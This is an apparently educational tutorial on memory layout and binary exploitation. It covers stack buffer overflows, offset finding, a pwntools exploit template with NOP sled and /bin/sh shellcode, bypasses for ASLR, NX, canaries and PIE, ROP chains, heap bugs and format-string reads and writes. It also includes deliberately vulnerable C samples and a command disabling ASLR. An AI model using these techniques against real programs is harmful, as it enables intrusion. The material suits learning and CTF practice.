- Memory is divided into segments: stack (local variables, function frames), heap (dynamic allocation), text (code), data (globals)
- The stack grows downward; buffer overflows write past the end of a buffer and overwrite adjacent memory
- The instruction pointer (EIP/RIP) controls what code executes next — overwriting it controls the program
- Modern defences: ASLR (randomises addresses), NX/DEP (non-executable stack), stack canaries, PIE
- ROP (Return-Oriented Programming) chains existing code gadgets to bypass NX without injecting new code
How a Program Uses Memory
When a program runs, the OS allocates a virtual address space divided into segments:
Each running process has its own virtual address space. The OS maps it to physical memory. This is why two processes can use the same address (e.g. 0x7fff...) without conflicting.
CPU Registers
Registers are tiny, ultra-fast storage locations inside the CPU.
| Register | Name | Purpose |
|---|---|---|
EIP / RIP | Instruction Pointer | Address of next instruction to execute |
ESP / RSP | Stack Pointer | Top of the current stack |
EBP / RBP | Base Pointer | Bottom of current stack frame |
EAX / RAX | Accumulator | General purpose, function return value |
EBX / RBX | Base | General purpose |
ECX / RCX | Counter | Loop counter |
EDX / RDX | Data | General purpose |
ESI / RSI | Source Index | String/memory operations source |
EDI / RDI | Destination Index | String/memory operations destination |
E prefix = 32-bit (x86). R prefix = 64-bit (x86-64). EIP/RIP is the most important — controlling it means controlling what the CPU executes next.
The Stack — Frame by Frame
The stack manages function calls. Every function call pushes a stack frame containing:
- Return address (where to go back after the function ends)
- Saved base pointer
- Local variables and buffers
void vulnerable(char *input) {
char buffer[64]; // 64 bytes on the stack
strcpy(buffer, input); // copies input with no length check
}When vulnerable() is called:
Buffer Overflows — The Classic Exploit
A buffer overflow happens when a program writes more data into a buffer than it can hold, overwriting adjacent memory.
// Vulnerable C code
void vuln() {
char name[100];
gets(name); // gets() has no length limit — NEVER use this
}
// Safe alternative
fgets(name, sizeof(name), stdin);Finding the Offset (How Many Bytes to Overwrite EIP)
# Generate a cyclic pattern (no repeating 4-byte sequences)
python3 -c "import pwn; print(pwn.cyclic(200).decode())"
# Or with Metasploit's tools
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 200
# After crash, find the offset from the value in EIP
python3 -c "import pwn; print(pwn.cyclic_find(0x61616171))" # pwntools
/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 0x61616171Writing the Exploit
import pwn
# Offset found: 112 bytes to reach EIP
padding = b"A" * 112
# Address to jump to (e.g. a JMP ESP instruction or shellcode address)
# Must match target architecture — little-endian for x86
eip = pwn.p32(0xdeadbeef) # 32-bit little-endian pack
# Shellcode — execve("/bin/sh", NULL, NULL)
shellcode = pwn.shellcraft.i386.linux.sh()
shellcode_bytes = pwn.asm(shellcode)
payload = padding + eip + b"\x90" * 16 + shellcode_bytes # NOP sled before shellcodeA NOP sled (\x90\x90\x90...) is a sequence of "do nothing" instructions before the shellcode. It gives the EIP a larger target to land on — any address in the sled slides down to the shellcode. Essential when the exact shellcode address is uncertain.
Modern Defences
Real-world systems have mitigations. Understanding each one shapes the exploitation approach.
ASLR (Address Space Layout Randomisation)
Randomises the base addresses of the stack, heap, and libraries on every execution.
# Check ASLR status on Linux
cat /proc/sys/kernel/randomize_va_space
# 0 = disabled, 1 = partial, 2 = full
# Disable for testing (requires root)
echo 0 | sudo tee /proc/sys/kernel/randomize_va_spaceBypasses: Memory leaks (format strings, heap spraying), brute force (32-bit only), partial overwrites.
NX / DEP (Non-Executable Memory)
Marks the stack and heap as non-executable. Shellcode injected there causes a segfault instead of running.
# Check if NX is enabled on a binary
checksec --file=./binaryBypass: Return-Oriented Programming (ROP) — use existing executable code, not injected shellcode.
Stack Canaries
A random value placed between local variables and the return address. If a buffer overflow overwrites the canary, the program detects it and crashes before the return.
# checksec shows all protections at once
checksec --file=./binary
# RELRO STACK CANARY NX PIE
# Full Canary found NX enabled EnabledBypass: Information leak to read canary value before overwriting it.
PIE (Position Independent Executable)
Makes the entire binary position-independent — code section is also randomised by ASLR.
Impact: Without PIE, the code (text) segment is always at a fixed address, making ROP gadgets trivially findable. PIE + ASLR together mean all addresses are randomised.
ROP — Return-Oriented Programming
ROP bypasses NX by chaining together small existing code sequences called gadgets — each ending with a ret instruction.
Normal call: CALL function → runs function → returns. ROP bypasses this by chaining gadgets via return addresses on the stack:
# Find ROP gadgets in a binary
ROPgadget --binary ./binary --rop
ropper -f ./binary
# pwntools automates chain building
python3 -c "
from pwn import *
elf = ELF('./binary')
rop = ROP(elf)
rop.call('system', [next(elf.search(b'/bin/sh'))])
print(rop.dump())
"The Heap — Dynamic Memory
The heap stores data allocated at runtime (malloc() in C, new in C++).
Heap vulnerabilities:
| Vulnerability | Cause | Impact |
|---|---|---|
| Heap overflow | Write past end of allocated chunk | Overwrite adjacent metadata |
| Use-After-Free (UAF) | Use pointer after free() | Dangling pointer > arbitrary write |
| Double Free | free() same pointer twice | Heap corruption |
| Heap spray | Fill heap with shellcode + offsets | Reliably land at known address |
UAF is the dominant class of memory corruption vulnerabilities in modern browsers (Chrome, Firefox). The browser's JavaScript heap is complex and frequently exploited. Most Chrome exploits in the wild are UAF.
Format String Vulnerabilities
printf(user_input) — if user_input contains format specifiers like %x, %s, %n, the function reads from (or writes to) the stack.
// Vulnerable
printf(user_input); // user controls format string
// Safe
printf("%s", user_input); // format string is fixed# Leak stack values:
./vuln <<< "%x.%x.%x.%x.%x"
# Write to memory (very powerful):
./vuln <<< "%n" # writes the number of bytes printed so far to the pointed addressWhat format strings give you:
- Arbitrary read — leak ASLR addresses, canary values
- Arbitrary write — overwrite function pointers, GOT entries
Tools for Binary Exploitation
| Tool | Purpose |
|---|---|
gdb + pwndbg/peda | Dynamic analysis, crash examination |
pwntools (Python) | Exploit scripting library |
checksec | Enumerate binary protections |
ROPgadget / ropper | Find ROP gadgets |
ghidra / IDA Pro | Static disassembly and decompilation |
ltrace / strace | Trace library/system calls |
objdump | Disassemble binary |
strings | Extract printable strings (find hardcoded creds) |
# Basic GDB workflow
gdb ./binary
(gdb) run < input.txt # Run with input
(gdb) info registers # Print all registers after crash
(gdb) x/32x $esp # Examine 32 hex words from stack pointer
(gdb) disassemble main # Disassemble main functionOperational Notes
- 32-bit vs 64-bit matters a lot — function arguments in 64-bit are passed in registers (
rdi,rsi,rdx) not on the stack. ROP chains and calling conventions differ entirely. - ASLR defeats most binary exploits on modern systems without a leak. Your first goal in most heap/stack exploits is getting a memory address, not code execution directly.
- CTF exploits vs real-world exploits — CTF binaries have protections disabled to make challenges tractable. Real programs have full protections enabled. The skills transfer, but the complexity scales up significantly.
- `strings ./binary | grep -i pass` — always run
stringson an unknown binary first. Hardcoded credentials are found this way more often than you'd expect.
What to Read Next
- Exploitation — apply this foundation to real CVEs, Metasploit, and manual exploit development
- Post-Exploitation — once inside, memory skills help dump credentials from LSASS
- Evasion & AV Bypass — shellcode obfuscation relies on understanding how memory and execution work